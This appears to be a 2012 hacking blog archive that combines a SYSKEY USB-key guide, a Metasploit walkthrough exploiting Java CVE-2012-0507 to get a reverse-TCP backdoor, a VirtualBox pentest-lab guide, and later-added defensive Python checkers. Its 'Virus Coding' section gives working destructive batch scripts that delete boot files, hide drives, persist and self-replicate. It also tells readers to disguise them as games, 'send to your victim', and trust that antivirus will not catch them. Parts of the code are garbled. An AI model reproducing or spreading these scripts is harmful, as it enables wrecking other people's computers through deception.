Monday, August 27, 2012

Lock/Unlock Computer With Pendrive


First, what is “syskey”?

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.
SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from BindView found a security hole in SYSKEY showing that a certain form of offline cryptanalytic attack was possible. A brute force attack then appeared to be possible.
Microsoft later collaborated with BindView to issue a fix for the problem (dubbed the ‘Syskey Bug’), which appears to have settled it, and SYSKEY has been pronounced secure enough to resist brute force attack.
According to Todd Sabin of the BindView team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.
So this is pretty cool, right?  Well, I really like the idea of keeping this on a floppy so that it requires a floppy disk (a sort of 2-factor (hardware/software) authentication?).
Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.
NOTE:  I haven’t tested copying data from 1 USB to another USB to see if it works as a backup.  This way you could lock up a USB drive as a spare if needed.
Here’s how to get this to work using a USB drive.
1.  Insert your USB drive into your system and wait for it to be recognized and for any necessary drivers to install.
2.  Fire up Disk Management and re-assign the drive letter it was given to “A”.
  • Start Disk Management by clicking Start and typing diskmgmt.msc
  • Right-click the USB drive and choose to assign a drive letter or path.
  • Assign it to letter “A”.
  • Accept the warning message.
  • Now your USB drive is “A”.
3.  Run Syskey and save the encryption key to USB drive “A”.
  • Click Start and type syskey, then press Enter.
  • Once Syskey has launched, click “Update”.
  • Choose “Store Startup key on floppy disk” and click “OK”.
  • You’ll be prompted to insert your diskette. Make sure your USB drive is inserted and writable.
4.  Reboot and have fun.  Don’t lose your USB disk!  Also, to revert this, you can run syskey again and choose to store the key locally instead of “on a floppy disk”.

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507



Whenever someone says PenTesting tool, the first thing that comes to mind is Metasploit. Today, I am going to demonstrate how to use the Metasploit tool to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).
About Metasploit:
Metasploit is a very powerful PenTesting tool. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. It is a very useful tool for information gathering, vulnerability scanning, exploit development, client-side exploits, ...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security team, along with several active community members, made a free course on the Metasploit Framework, "Mastering the Framework". The course covers information gathering, social engineering attacks, exploit development, advanced AV avoidance, etc.

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
"Mastering the Framework" is a free course. If you enjoyed the course, please donate to Hackers for Charity (HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is sent directly to Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a sec; take that course once I have demonstrated how to use Metasploit, because it will be hard to understand, or boring, if you read those things directly.

Requirements:
  • VirtualBox
  • Target OS (Windows, ...)
  • PenTesting distro (Backtrack)
  • JRE 6 (unpatched version)

CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.
Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, the Flashback malware infected more than 600,000 Mac computers by exploiting this vulnerability. Recently, the INSS and Amnesty International UK websites were injected with malicious code that exploits CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have set up two virtual machines, namely "Target" and "BT5". I have installed XP 2 on "Target" and Backtrack 5 R2 on "BT5".

(Need help configuring the VMs? Read this: setup PenTesting Lab.)

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate".  This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is a recent vulnerability, you have to update the MSF before proceeding further.

Slow Internet connection?! If you have a slow Internet connection, you can download the java_atomicreferencearray module alone instead of updating all modules.
Download java_atomicreferencearray.rb and paste it into the folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then download CVE-2012-0507.jar and paste it into the folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring up the Metasploit console, where you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display which settings are available and/or required for this specific module.

Now type "set SRVPORT 80" and "set URIPATH /".

Step 3: Set Payload
Type "show payloads"; this will display the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will make a reverse TCP connection from the Target to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address]:  In order to get the reverse connection, we have to set our IP in LHOST.

Open the Terminal and type "ifconfig". This will display the IP info of our PenTesting machine.  The IP will be "192.168.56.x".   For instance, let me say the IP is 192.168.56.10.

Now type "set LHOST 192.168.56.10" in the msfconsole.



Part IV: Breaching the Target Machine:

So, are you ready?! Let us break into the Target machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler on our machine, and it will wait for anyone who connects to our HTTP server (e.g. http://192.168.56.10). Once the victim connects to our server, it will send a jar that will exploit the CVE-2012-0507 vulnerability.

Step 2:

Open Firefox/IE on the Target machine.
Enter "http://192.168.56.10".
It loads nothing, but the exploit will run in the background.

Step 3:
Open the BT5 machine; it will display the following output:


Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact with and control the Target.


Step 4: Upload files

Yeeeh..! We got a backdoor to the Target machine; now we can run any commands on the Target.

For example, typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files on the Target machine.

"upload /Test.exe c:\\": this command will upload Test.exe from the root ('file system' dir) folder of the BT5 to the C drive of the Target.

"execute -f C:\\Test.exe": this command will run our uploaded file on the Target.


Security Tips:
Update your JRE to the latest version.
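
To find machines that still need that update, a defender can look at the Java version the plug-in sends in its User-Agent header. The following is an added example, not part of the original post: the log layout and sample lines are constructed, and the first fixed updates (6u31, 7u3, 5.0u34) come from Oracle's February 2012 Java SE update, not from this page.

```python
import re
from urllib.parse import urlsplit

# First update of each Java family that carries the CVE-2012-0507 fix
# (Oracle's February 2012 Java SE update; these numbers are not on the page).
FIRST_FIXED_UPDATE = {5: 34, 6: 31, 7: 3}

# The Java plug-in appends e.g. "Java/1.6.0_26" to its HTTP User-Agent.
JAVA_UA = re.compile(r"Java/(\d+)\.(\d+)\.\d+(?:_(\d+))?")
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
JAR_TYPES = {"application/java-archive", "application/x-java-archive"}

# Constructed log layout: timestamp client method url content-type "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) '
    r'(?P<ctype>\S+) "(?P<ua>[^"]*)"$')


def jre_is_vulnerable(user_agent):
    """True/False for a Java user agent, None when the client is not Java."""
    m = JAVA_UA.search(user_agent)
    if not m:
        return None
    first, second, update = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    major = second if first == 1 else first      # "1.6.0_26" is Java 6
    fixed = FIRST_FIXED_UPDATE.get(major)
    # Java 1.4 and older have no AtomicReferenceArray; Java 8+ shipped fixed.
    return update < fixed if fixed is not None else False


def review_proxy_log(lines):
    """Return one finding per request made by an unpatched JRE."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m or jre_is_vulnerable(m["ua"]) is not True:
            continue
        url = urlsplit(m["url"])
        jar = m["ctype"].lower() in JAR_TYPES or url.path.lower().endswith(".jar")
        bare_ip = bool(BARE_IP.match(url.netloc))
        findings.append({
            "client": m["client"],
            "url": m["url"],
            "jar_delivered": jar,
            "bare_ip_host": bare_ip,
            # An unpatched JRE fetching a JAR from a host addressed by raw IP
            # deserves a closer look than one talking to a named server.
            "severity": "high" if jar and bare_ip else "medium",
        })
    return findings


# Constructed sample lines (lab addresses reused from the walkthrough above).
SAMPLE_LOG = [
    '2012-08-27T10:01:02 192.168.56.101 GET http://192.168.56.10/ text/html "Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1"',
    '2012-08-27T10:01:03 192.168.56.101 GET http://192.168.56.10/applet.jar application/octet-stream "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_26"',
    '2012-08-27T10:05:40 192.168.56.102 GET http://intranet.example.com/tool.jar application/java-archive "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_02"',
    '2012-08-27T10:07:11 192.168.56.103 GET http://192.168.56.20/app.jar application/java-archive "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_33"',
]

if __name__ == "__main__":
    for f in review_proxy_log(SAMPLE_LOG):
        print(f["severity"], f["client"], f["url"])
```

Every client it reports is a machine to patch first, whatever the request turns out to be.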

Conclusion:
I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the tutorial, right?! If you have any suggestions or doubts, please drop a comment or mail me.

Virus Coding


 

Viruses that crash your own PC!

@echo
offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!
Type this in notepad
start virus.bat
virus.bat
and save as with this name – virus.bat
Your antivirus will not detect this virus.
Basically this program will delete all the files which are needed for booting. If your OS is installed on the D drive instead of C, then replace c with d.
Save it as 'sth.bat'(Virus Coding)!!
Matrix Virus!
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
Sleep(60);
}
}
for ( int j = 0; j
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
}
goto START;
}
Open notepad and paste this:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as eicar.com. The anti-virus should stop you (if it does, that means it's working).
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System is hacked by us!\” -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “www.ethicalhack4u.blogspot.com”
start firefox “www.maverick-deepanker.blogspot.com”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart
How to create an advanced and dangerous virus:
@echo off>nul.ViRuS
if “%1==”/ViRuS_MULTIPLY goto ViRuS_multiply
if “%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if “%1==”/ViRuS_FINDSELF goto ViRuS_findself
if “%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if “%ViRuSname%==” goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it’s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT
:ViRuS_findself
if “%2==” goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself
:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
:ViRuS_multiply
find “ViRuS” xViRuSx.bat
find /v “ViRuS” >xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This Virus Is Made By U-Hacker.
:XXX_END
Save it as virus7.exe and release the monster.

Sunday, August 26, 2012

Protect your Computer from Viruses and Hackers


How do you protect your computer?

Check this out [works for Windows XP, Vista].

This trick will help against hackers and viruses (it is mostly helpful against viruses).

Caution: You must be Admin or have Admin privileges.

Step 1:

Go to “Folder Options” in “Control Panel” –> “View” tab.
Uncheck “Use Simple File Sharing” –> Apply & OK.

Step 2:

Right-click on the C: drive (if the operating system is installed on the C: drive) –> Properties.
You will see a new tab named “Security”; click on it.
Select Users under “Group or user names” (you will see all the permissions users have on the C: drive) –> edit them as per your requirement (suggestion: uncheck the Write permission for all users except Admin) and apply.
Restart it!!

Mission Over

[Suggestion: Use this trick during a fresh installation, and just use any other user who has no Admin privileges.]

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

We have provided you with plenty of ethical hacking and pentesting tutorials, and more articles are still to come.  Meanwhile, I would like to teach you how to set up your own pen testing/hacking network lab.

Use of your own Pen Testing Lab:

  • Free, free, free..! It's a free lab, because it is yours.
  • Only one system is enough
  • You can practice your pentesting/hacking skills
  • You can install any kind of malware (spyware, trojan) or RATs and test how it works
  • and more ...
Is it possible to create a lab with a single system?
Yes, you can. We are going to set up a lot of vulnerable systems virtually.  Confused? VirtualBox is open source software provided by Oracle Corp. that allows you to run multiple guest OSes (virtual systems) on a single system.

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, learn how to configure a guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will explain everything about VirtualBox and how to set up a guest OS.

I hope you are now familiar with installing a guest OS.

Set Up your Target system:
Now we have to set up the target system.  Install Windows XP in VirtualBox using the xp.iso file.  After the installation has completed, disable the firewall in XP so that it becomes a more vulnerable system.

Set up your PenTesting System:
Install Backtrack5 in VirtualBox. Backtrack is a penetration testing Linux distribution that has a lot of hacking tools.  We will hack the target system using this Backtrack.

Network Settings for Guest Os:
Step 1:
Click the File menu in VirtualBox and select Preferences.
Now select the Network tab.
Click the + symbol at the side; this will add a new host-only network.

Step 2:

Right-click on the guest OS (e.g. xp, backtrack) and select Settings.
Select the Network tab.
Now you can see the "Attached to" option menu.
Change it from NAT to "Host-only Adapter".
Do the same thing for both guest OSes.

Step 3:

Now run both guest OSes.
Finding the IP address of the Target System:
Open the Windows XP guest OS window.
Open cmd in Windows XP and type ipconfig.
This will show the IP address of XP. It will be 192.168.56.101.
Hacking with the Pen Testing System:
Open the Terminal and type "nmap 192.168.56.101".
Now it will show the list of open ports.

You can hack the target system with open ports.
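
Because the target VM runs with its firewall disabled, it is worth confirming that no lab adapter is still attached to NAT or a bridged interface before powering the guests on. The following is an added example, not part of the original post: it parses the output of VirtualBox's `VBoxManage showvminfo <vm> --machinereadable`; the VM names "Target" and "BT5" are taken from the Metasploit walkthrough on this page and the sample output is constructed.

```python
import re
import subprocess

# Attachment modes that keep guest traffic on the host or inside VirtualBox.
ISOLATED_MODES = {"hostonly", "intnet", "none", "null"}

# Machine-readable lines look like: nic1="hostonly"
KEY_VALUE = re.compile(r'^([A-Za-z0-9_]+)="?([^"]*)"?$')


def read_vminfo(vm_name):
    """Fetch the machine-readable description of a VM from VirtualBox."""
    result = subprocess.run(
        ["VBoxManage", "showvminfo", vm_name, "--machinereadable"],
        capture_output=True, text=True, check=True)
    return result.stdout


def nic_exposures(vminfo_text):
    """Return [(nic_number, mode)] for every adapter that can leave the host."""
    exposed = []
    for line in vminfo_text.splitlines():
        m = KEY_VALUE.match(line.strip())
        if not m:
            continue
        nic = re.fullmatch(r"nic(\d+)", m.group(1))
        if nic and m.group(2) not in ISOLATED_MODES:
            exposed.append((int(nic.group(1)), m.group(2)))
    return sorted(exposed)


def exposed_adapters_by_vm(vminfo_by_vm):
    """Map VM name -> exposed adapters; an empty dict means the lab is contained."""
    report = {}
    for name, text in vminfo_by_vm.items():
        exposed = nic_exposures(text)
        if exposed:
            report[name] = exposed
    return report


# Constructed sample output: "BT5" still has a second adapter left on NAT.
TARGET_INFO = 'name="Target"\nnic1="hostonly"\nhostonlyadapter1="vboxnet0"\nnic2="none"\n'
BT5_INFO = 'name="BT5"\nnic1="hostonly"\nhostonlyadapter1="vboxnet0"\nnic2="nat"\nnatnet2="nat"\n'

if __name__ == "__main__":
    # On a real host, replace the samples with read_vminfo("Target") etc.
    report = exposed_adapters_by_vm({"Target": TARGET_INFO, "BT5": BT5_INFO})
    for vm, nics in report.items():
        for number, mode in nics:
            print(f"{vm}: adapter {number} is attached to '{mode}', not host-only")
```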